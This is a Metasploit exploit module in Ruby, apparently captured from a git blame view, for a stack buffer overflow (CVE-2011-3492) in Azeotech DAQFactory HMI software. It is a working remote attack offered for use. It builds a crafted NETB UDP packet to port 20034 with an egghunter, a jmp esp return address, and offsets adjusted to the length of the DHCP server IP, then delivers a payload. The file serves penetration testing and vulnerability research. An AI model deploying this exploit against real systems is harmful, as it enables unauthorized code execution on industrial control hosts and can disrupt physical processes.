2011-09-18 02:45:55 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = GoodRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Udp
|
|
|
|
include Msf::Exploit::Remote::Egghunter
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'DaqFactory HMI NETB Request Overflow',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a stack buffer overflow in Azeotech's DaqFactory
|
|
|
|
product. The specfic vulnerability is triggered when sending a specially crafted
|
|
|
|
'NETB' request to port 20034. Exploitation of this vulnerability may take a few
|
|
|
|
seconds due to the use of egghunter. This vulnerability was one of the 14
|
|
|
|
releases discovered by researcher Luigi Auriemma.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Luigi Auriemma', # Initial discovery, crash poc
|
|
|
|
'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit
|
|
|
|
],
|
|
|
|
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'References' =>
|
|
|
|
[
|
2011-09-19 11:38:49 +00:00
|
|
|
[ 'CVE', '2011-3492'],
|
|
|
|
[ 'OSVDB', '75496'],
|
|
|
|
[ 'URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
|
2011-09-18 02:45:55 +00:00
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
|
|
|
'InitialAutoRunScript' => 'migrate -f',
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 600,
|
|
|
|
'BadChars' => "\x00",
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[
|
|
|
|
'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
|
|
|
|
{
|
|
|
|
'Ret' => 0x100B9EDF, # jmp esp PEGRP32A.dll
|
|
|
|
'Offset' => 636,
|
|
|
|
}
|
|
|
|
],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Sep 13 2011',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
# Required for EIP offset
|
|
|
|
OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
|
|
|
|
Opt::RPORT(20034)
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
connect_udp
|
|
|
|
|
|
|
|
print_status("Trying target #{target.name}...")
|
|
|
|
|
|
|
|
eggoptions ={
|
|
|
|
:checksum => false,
|
|
|
|
:eggtag => 'scar',
|
|
|
|
}
|
|
|
|
|
|
|
|
# Correct the offset according to the 2nd IP (DHCP) length
|
|
|
|
iplen = datastore['DHCP'].length
|
|
|
|
|
|
|
|
if iplen == 15
|
|
|
|
offset = 78
|
|
|
|
elsif iplen == 14
|
|
|
|
offset = 79
|
|
|
|
elsif iplen == 13
|
|
|
|
offset = 80
|
|
|
|
elsif iplen == 12
|
|
|
|
offset = 81
|
|
|
|
elsif iplen == 11
|
|
|
|
offset = 82
|
|
|
|
elsif iplen == 10
|
|
|
|
offset = 83
|
|
|
|
elsif iplen == 9
|
|
|
|
offset = 84
|
|
|
|
elsif iplen == 8
|
|
|
|
offset = 85
|
|
|
|
elsif iplen == 7
|
|
|
|
offset = 86
|
|
|
|
elsif iplen == 6
|
|
|
|
offset = 87
|
|
|
|
# attack class A ip, slightly unlikly, but just in case.
|
|
|
|
elsif iplen == 5
|
|
|
|
offset = 88
|
|
|
|
end
|
|
|
|
|
|
|
|
if offset >= 80
|
|
|
|
pktoffset = offset - 80
|
|
|
|
finaloffset = target['Offset']-pktoffset
|
|
|
|
elsif offset <= 79
|
|
|
|
pktoffset = 80 - offset
|
|
|
|
finaloffset = target['Offset']+pktoffset
|
|
|
|
end
|
|
|
|
|
|
|
|
# springboard onto our unmodified payload
|
|
|
|
p = Rex::Arch::X86.jmp(750) + payload.encoded
|
|
|
|
hunter,egg = generate_egghunter(p, payload_badchars, eggoptions)
|
|
|
|
|
|
|
|
sploit = "NETB" # NETB request overflow
|
|
|
|
sploit << rand_text_alpha_upper(233)
|
|
|
|
sploit << "\x00" # part of the packet structure
|
|
|
|
sploit << rand_text_alpha_upper(offset) # include the offset for the DHCP address
|
|
|
|
sploit << make_nops(2)
|
|
|
|
sploit << hunter
|
|
|
|
sploit << rand_text_alpha_upper(52-hunter.length-2)
|
|
|
|
sploit << [target.ret].pack("V")
|
|
|
|
sploit << rand_text_alpha_upper(12)
|
|
|
|
sploit << Rex::Arch::X86.jmp_short(-70)
|
|
|
|
sploit << egg
|
|
|
|
# packetlen needs to be adjusted to a max of 0x400 as per advisory
|
|
|
|
sploit << rand_text_alpha_upper(finaloffset-egg.length)
|
|
|
|
|
|
|
|
# The use of rand_text_alpha_upper() ensures we always get the same length for the
|
|
|
|
# first IP address. See the following for more details:
|
|
|
|
# http://dev.metasploit.com/redmine/issues/5453
|
|
|
|
sploit[12,4] = rand_text_alpha_upper(4)
|
|
|
|
|
|
|
|
udp_sock.put(sploit)
|
|
|
|
|
|
|
|
handler
|
|
|
|
disconnect_udp
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|